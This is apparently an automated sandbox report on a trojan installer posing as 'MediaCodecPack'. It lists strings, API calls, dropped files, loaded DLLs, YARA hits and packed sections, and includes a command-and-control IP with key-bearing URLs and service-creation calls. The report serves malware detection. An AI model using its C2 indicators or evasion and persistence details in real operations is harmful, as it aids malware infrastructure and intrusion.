                    Source: newwork.exe.1.tmp, 00000001.00000002.2575850575.0000000005ADC000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000000.1337100436.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, MediaCodecPack.exe.3.dr, mediacodecpack.exe.1.dr, is-D6CVE.tmp.1.dr | String found in binary or memory: http://wonderwork.ucoz.com/
                    Source: newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1326674876.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-P1HNB.tmp.1.dr | String found in binary or memory: http://www.innosetup.com/
                    Source: newwork.exe.1.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: newwork.exe.1.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: newwork.exe.1.exe, 00000000.00000003.1326087653.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1326248808.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1326674876.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-P1HNB.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/ps
                    Source: newwork.exe.1.exe, 00000000.00000003.1326087653.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1326248808.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000000.1326674876.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-P1HNB.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/psU
                    Source: mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/
                    Source: mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/779CB9834B480E8EE1B8DFF231005E9DC5D8267
                    Source: mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/PTKa
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/S
                    Source: mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e3008881325
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/e
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/en-GB
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/en-US
                    Source: mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ography
                    Source: newwork.exe.1.exe, 00000000.00000003.1325798542.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1325714956.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000002.2573166725.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1327471325.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1327811982.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.2574636674.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.2573405234.0000000000857000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.10:49838 version: TLS 1.2
                    Source: is-UJAIS.tmp.1.dr | Binary or memory string: DirectDrawCreateExmemstr_da573da9-f
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0042F520 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00423B84 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004125D8 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00478AC0 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00457594 PostMessageA, PostMessageA, SetForegroundWindow, NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0042E934 CreateFileA, DeviceIoControl, GetLastError, CloseHandle, SetLastError
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00409448 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, GetLastError, ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004555E4 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, GetLastError, ExitWindowsEx
                    Source: Joe Sandbox View | Dropped File: C:\ProgramData\MediaCodecPack\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 00457F1C appears 69 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 00403400 appears 60 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 00457D10 appears 90 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 004078F4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 00403494 appears 80 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 00403684 appears 210 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 00453344 appears 94 times
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: String function: 004460A4 appears 59 times
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: String function: 02D17760 appears 32 times
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: String function: 02D22A10 appears 135 times
                    Source: newwork.exe.1.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: newwork.exe.1.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: newwork.exe.1.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-P1HNB.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-P1HNB.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-P1HNB.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.3.dr | Static PE information: Number of sections : 19 > 10
                    Source: is-JJJFI.tmp.1.dr | Static PE information: Number of sections : 19 > 10
                    Source: newwork.exe.1.exe, 00000000.00000003.1326087653.0000000002310000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs newwork.exe.1.exe
                    Source: newwork.exe.1.exe, 00000000.00000003.1326248808.00000000020E8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs newwork.exe.1.exe
                    Source: newwork.exe.1.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engine | Classification label: mal96.troj.evad.winEXE@5/26@0/2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D0F8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_00401CE4 CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0046E0E4 GetVersion,CoCreateInstance
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_00401C49 StartServiceCtrlDispatcherA
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\Programs
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | File created: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp
                    Source: Yara match | File source: 3.0.mediacodecpack.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000003.00000000.1336954414.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.2575850575.0000000005A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-D6CVE.tmp, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, type: DROPPED
                    Source: Yara match | File source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File read: C:\Windows\win.ini
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.dr | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: mediacodecpack.exe, 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, is-JJJFI.tmp.1.dr, sqlite3.dll.3.dr | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: newwork.exe.1.exe | ReversingLabs: Detection: 15%
                    Source: newwork.exe.1.exe | String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: newwork.exe.1.exe | String found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | File read: C:\Users\user\Desktop\newwork.exe.1.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\newwork.exe.1.exe "C:\Users\user\Desktop\newwork.exe.1.exe"
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Process created: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp "C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp" /SL5="$2047E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Process created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: msacm32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: riched20.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: usp10.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: msls31.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Section loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: sqlite3.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Window found: window name: TMainForm
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1
                    Source: newwork.exe.1.exe | Static file information: File size 3314669 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-VMCDM.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-8I59M.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-VMCDM.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-UJAIS.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-8I59M.tmp.1.dr

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Unpacked PE file: 3.2.mediacodecpack.exe.400000.0.unpack .aitt4:ER;.ajtt4:R;.aktt4:W;.rsrc:R;.altt4:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Unpacked PE file: 3.2.mediacodecpack.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: initial sample | Static PE information: section where entry point is pointing to: .aitt4
                    Source: mediacodecpack.exe.1.dr | Static PE information: section name: .aitt4
                    Source: mediacodecpack.exe.1.dr | Static PE information: section name: .ajtt4
                    Source: mediacodecpack.exe.1.dr | Static PE information: section name: .aktt4
                    Source: mediacodecpack.exe.1.dr | Static PE information: section name: .altt4
                    Source: is-UJAIS.tmp.1.dr | Static PE information: section name: Shared
                    Source: is-JJJFI.tmp.1.dr | Static PE information: section name: /4
                    Source: is-JJJFI.tmp.1.dr | Static PE information: section name: /19
                    Source: is-JJJFI.tmp.1.dr | Static PE information: section name: /35
                    Source: is-JJJFI.tmp.1.dr | Static PE information: section name: /51
                    Source: is-JJJFI.tmp.1.dr | Static PE information: section name: /63
                    Source: is-JJJFI.tmp.1.dr | Static PE information: section name: /77
                    Source: is-JJJFI.tmp.1.dr | Static PE information: section name: /89
                    Source: is-JJJFI.tmp.1.dr | Static PE information: section name: /102
                    Source: is-JJJFI.tmp.1.dr | Static PE information: section name: /113
                    Source: is-JJJFI.tmp.1.dr | Static PE information: section name: /124
                    Source: MediaCodecPack.exe.3.dr | Static PE information: section name: .aitt4
                    Source: MediaCodecPack.exe.3.dr | Static PE information: section name: .ajtt4
                    Source: MediaCodecPack.exe.3.dr | Static PE information: section name: .aktt4
